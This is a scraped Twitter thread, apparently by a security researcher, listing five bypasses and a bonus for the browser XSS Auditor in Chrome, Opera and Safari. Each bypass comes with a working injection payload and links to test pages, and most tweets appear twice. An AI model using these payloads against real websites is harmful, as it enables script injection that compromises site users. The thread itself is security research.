Gonna start a series of tweets about current bypasses in #XSS Auditor, 1 per day.
Bypassing Auditor increases dramatically the success of a XSS attack and the impact of such flaws, affecting users of following major browsers:
Chrome, Opera and Safari.
Stay tuned! 😎
Bypassing Auditor increases dramatically the success of a XSS attack and the impact of such flaws, affecting users of following major browsers:
Chrome, Opera and Safari.
Stay tuned! 😎
#XSS Auditor Bypass #1
The easiest one, HTMLi breaking out from script block (it must land where JS syntax is not affected though).
</script><svg><script>alert(1)%0A-->
brutelogic.com.br/xss.php?c1=%3C…
Notice the source code becomes red flagged (sign of Auditor) but it still executes.
The easiest one, HTMLi breaking out from script block (it must land where JS syntax is not affected though).
</script><svg><script>alert(1)%0A-->
brutelogic.com.br/xss.php?c1=%3C…
Notice the source code becomes red flagged (sign of Auditor) but it still executes.
#XSS Auditor Bypass #2
In reflections of URL where payload can be included on its path (like in PHP_SELF vulnerability or friendly URLs).
<link rel=import href='./"><svg%20onload=alert(domain)>'>
brutelogic.com.br/xss.php/%22%3E…
Support to link imports will end soon though.
In reflections of URL where payload can be included on its path (like in PHP_SELF vulnerability or friendly URLs).
<link rel=import href='./"><svg%20onload=alert(domain)>'>
brutelogic.com.br/xss.php/%22%3E…
Support to link imports will end soon though.
#XSS Auditor Bypass #3
Main case, outside tags and whenever there's more code after it to close injected HTML.
<iframe src="javascript:alert(1)%%0D3C--
brutelogic.com.br/xss.php?a=%3Ci…
Discovered almost 2 years ago (shared privately), it works w/ every XSS vector w/ src or href.
Main case, outside tags and whenever there's more code after it to close injected HTML.
<iframe src="javascript:alert(1)%%0D3C--
brutelogic.com.br/xss.php?a=%3Ci…
Discovered almost 2 years ago (shared privately), it works w/ every XSS vector w/ src or href.
(missing a ! after 0D3C in payload above)
#XSS Auditor Bypass #4
Single input, multi injection scenarios (single input) for HTML alone or HTML+JS contexts.
"`/alert(1)</script><script>`
brutelogic.com.br/multi/double-h…
brutelogic.com.br/multi/double-m…
There can't be a full script block between reflections though.
Single input, multi injection scenarios (single input) for HTML alone or HTML+JS contexts.
"`/alert(1)</script><script>`
brutelogic.com.br/multi/double-h…
brutelogic.com.br/multi/double-m…
There can't be a full script block between reflections though.
#XSS Auditor Bypass #5
Call of uploaded image files with JS code from publicly accessible URLs in same origin.
<link rel=import href=/path/file.ext>
brutelogic.com.br/xss.php?a=%3Cl…
brutelogic.com.br/xss.php?b1=%22…
SVG file extension also works with
<embed src=/path/file.svg>
Call of uploaded image files with JS code from publicly accessible URLs in same origin.
<link rel=import href=/path/file.ext>
brutelogic.com.br/xss.php?a=%3Cl…
brutelogic.com.br/xss.php?b1=%22…
SVG file extension also works with
<embed src=/path/file.svg>
* BONUS *
A #XSS Auditor bypass is also possible if you can import (from same origin) a JS lib or an entire document with a DOM-based vulnerability.
brutelogic.com.br/xss.php?a=%3Cl…
EOT. 😎
A #XSS Auditor bypass is also possible if you can import (from same origin) a JS lib or an entire document with a DOM-based vulnerability.
brutelogic.com.br/xss.php?a=%3Cl…
EOT. 😎
• • •
Missing some Tweet in this thread? You can try to
force a refresh
